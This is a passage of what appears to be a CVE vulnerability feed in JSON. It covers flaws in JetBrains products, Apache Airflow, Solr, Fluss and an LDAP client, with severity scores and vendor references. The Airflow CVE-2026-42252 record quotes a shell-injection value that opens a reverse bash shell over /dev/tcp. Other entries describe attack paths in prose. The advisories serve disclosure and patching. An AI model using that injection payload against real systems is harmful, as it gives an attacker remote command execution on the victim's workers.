requests"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N","baseScore":3.4,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.7,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-201"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13162","matchCriteriaId":"16BA3B34-2381-4EDE-A6C7-AF6D710E9FFD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49382","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.223","lastModified":"2026-06-01T13:59:29.857","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1 code execution was possible via template injection in the Copyright plugin"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":4.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.0,"impactScore":3.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-1336"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1","matchCriteriaId":"FA503AD2-B0F0-47D1-984A-E40B3D3200FD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49383","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.340","lastModified":"2026-06-01T13:58:14.507","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains IntelliJ IDEA before 2026.1 xXE in the UI Designer form parser was possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":3.3,"baseSeverity":"LOW","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":1.4}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:intellij_idea:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1","matchCriteriaId":"FA503AD2-B0F0-47D1-984A-E40B3D3200FD"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49384","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.453","lastModified":"2026-06-01T12:44:17.300","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains PyCharm before 2025.3.4 stored XSS in Jupyter notebook Markdown cells was possible"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:pycharm:*:*:*:*:*:*:*:*","versionEndExcluding":"2025.3.4","matchCriteriaId":"4FD21590-E657-4A6D-B205-4E68B9229E20"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49385","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.567","lastModified":"2026-06-01T12:41:03.800","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13570 improper access control allowed low-privileged users to modify service accounts"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13570","matchCriteriaId":"ADA8504E-1873-4D57-ACA1-2F17F20FC926"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-49386","sourceIdentifier":"cve@jetbrains.com","published":"2026-05-29T19:16:28.683","lastModified":"2026-06-01T12:40:37.790","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In JetBrains YouTrack before 2026.1.13570 improper access control allowed enumeration of restricted issues and articles on Planning Canvas"}],"metrics":{"cvssMetricV31":[{"source":"cve@jetbrains.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"cve@jetbrains.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:jetbrains:youtrack:*:*:*:*:*:*:*:*","versionEndExcluding":"2026.1.13570","matchCriteriaId":"ADA8504E-1873-4D57-ACA1-2F17F20FC926"}]}]}],"references":[{"url":"https://www.jetbrains.com/privacy-security/issues-fixed/","source":"cve@jetbrains.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-35563","sourceIdentifier":"security@apache.org","published":"2026-06-01T08:16:20.307","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"It was identified that the LDAP client implementation in version 2.1.7 does not verify if the server certificate matches the intended LDAP \nhostname. While the underlying code validates the certificate chain \nagainst a trusted authority, the absence of endpoint identification \nallows a valid certificate issued for an entirely unrelated host to be \nimproperly accepted. This oversight leaves the connection highly \nvulnerable to server impersonation and complete connection compromise.\n\n\nThe\n root cause of this vulnerability lies in the incomplete TLS server \nidentity verification within the LDAP client implementation.\n\n\n\n\nThe attacker requires MITM capability on the network to exploit this vulnerability. This attacker must be able to present a certificate trusted by the client's configured trust store.\n\n\n\n\nThe hostname verification has been enforced in the new version of the LDAP API"}],"metrics":{"cvssMetricV40":[{"source":"security@apache.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"LOW","subAvailabilityImpact":"LOW","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-297"}]}],"references":[{"url":"https://lists.apache.org/thread/5rc2nzqxp1m9wknyf93r8dnp46fhc1nn","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/06/01/2","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-40861","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:17.893","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack — e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-59"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65325","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/1","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-40961","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.010","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in the login redirect route in Apache Airflow allowed authenticated users to craft URLs that bypassed the `is_safe_url` check, enabling redirection from a trusted Airflow domain to an attacker-controlled origin. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deployment operators can place Airflow behind a reverse proxy that strips off-domain `next=` query parameters before they reach the login endpoint."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65557","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/qmt8ksh7gty6b8hr9w294t94j36jdv1q","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/2","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-41014","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.230","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The partitioned_dag_runs endpoints in the Airflow UI enforced only asset-level access control, not per-Dag authorization. An authenticated UI/API user with global Asset:read permission could enumerate partition run state, schedule configuration, and asset wiring for Dags they were not authorized to read. Affects deployments that rely on per-Dag read scoping while granting users broader Asset access. Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65344","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/12nbzwwby7g883w2j13gn7ny1545xob9","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/4","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-41084","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.453","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's bulk Task Instances API (`PATCH/DELETE /api/v2/dags/{dag_id}/dagRuns/{dag_run_id}/taskInstances`) evaluated authorization against the `dag_id` resolved from the URL path while operating on the `dag_id` / `dag_run_id` extracted from request-body entity fields. An authenticated UI/API user with edit permission on one Dag could mutate Task Instance state in any other Dag by keeping the authorized Dag's ID in the URL path and naming the target Dag's IDs in the request body entities. Affects deployments that rely on per-Dag edit-scope to keep Task Instance state isolated between teams. Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/64288","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/w0hdcqfr71hf9rl1bwvpjs7q9yp1bldk","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/7","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-42252","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.560","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf['conf1'] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i >& /dev/tcp/.../9999 0>&1; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-1336"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/64129","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-42359","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:18.907","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's XCom PATCH endpoint `PATCH /api/v2/xcomEntries/{key}` allowed an authenticated UI/API user with XCom write permission on a Dag to set XCom entries under reserved key names (e.g. `return_value`) that the matching POST endpoint already validated against `FORBIDDEN_XCOM_KEYS`. The endpoint also accepted serialized payload shapes the triggerer's deserializer treats as code; combined, this allowed RCE on the triggerer when the affected task next deferred. Affects deployments where untrusted users have XCom write permission on Dags that defer to the triggerer. This is a fix-bypass of CVE-2026-33858: PR #64148 added the `FORBIDDEN_XCOM_KEYS` validator only on the POST/set path; the PATCH path was not covered. Users who already upgraded for CVE-2026-33858 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the PATCH-path bypass."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65915","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/g8dqykpf1p90tysq8tln4qtkqwb1038s","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-44825","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.267","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allows a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. \n\nAs an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords.\nThe future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue.\n\nNot affected:\n  *  Clusters where bin/solr auth enable was not used to bootstrap BasicAuth\n  *  Clusters where template users have been assigned strong passwords after bootstrap"}],"metrics":{"cvssMetricV31":[{"source":"security@apache.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-798"},{"lang":"en","value":"CWE-1188"}]}],"references":[{"url":"https://lists.apache.org/thread/5xg6xr99glocp3zsg9ht2zlbwlrst7ch","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/29/6","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-45360","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.480","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler — the default on single-host deployments where the DAG bundle is importable from the scheduler process — could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/66737","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/12","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-45426","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:19.583","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/66749","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/13","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-46764","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.073","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"The Event Log detail endpoint `GET /api/v2/eventLogs/{event_log_id}` in Apache Airflow fetched audit-log rows directly by numeric ID after only the generic Audit Log permission check, while the collection endpoint `GET /api/v2/eventLogs` applied per-Dag scoping. An authenticated UI/API user with audit-log read permission for one Dag could retrieve audit-log entries for any other Dag by guessing or enumerating the numeric event log ID. Affects deployments that rely on per-Dag audit-log scoping. Users are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/67112","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/ctrbj7q3m86g4qxmo9ponojgmzrcoqpv","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/31/14","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-48726","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.187","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-613"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/67289","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx","source":"security@apache.org"},{"url":"https://www.cve.org/CVERecord?id=CVE-2025-57735","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49267","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.543","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Airflow's EmailOperator and the underlying `airflow.utils.email` helpers established SMTP STARTTLS connections without verifying the remote certificate when the deployment used `[email] smtp_starttls=True` without `[email] smtp_ssl`. An attacker positioned between the worker and the configured SMTP server (network MITM — typical hostile-network attack-surface for environments where the SMTP relay sits outside the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded.\n\nThis CVE covers the **core apache-airflow side** of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Users who already applied the SMTP-provider fix from CVE-2026-41016 should additionally upgrade `apache-airflow` to 3.2.2 or later to cover the core-side path through `airflow.utils.email`. Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker.\n\nUsers are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-295"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65346","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/6v2ds757000msmjmovnnqryqzks83ps0","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49298","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.770","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's KubernetesExecutor caused JWT tokens used by worker pods to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints — triggering Dag runs, clearing runs, reading or writing Variables / Connections / XComs — as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface — the two fixes are complementary, not duplicates."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-538"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/60108","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/wo09vrks8189dzsot39rvrx3vnx102tt","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49361","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.880","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service.\n\nThis issue affects Apache Fluss (incubating): 0.8.0 and 0.9.0.\n\nUsers are recommended to upgrade to version 0.9.1, which fixes the issue."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://lists.apache.org/thread/dccw6tj0njwtmvbftq13mw7fdhsok373","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/30/5","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-10244","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.340","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was detected in 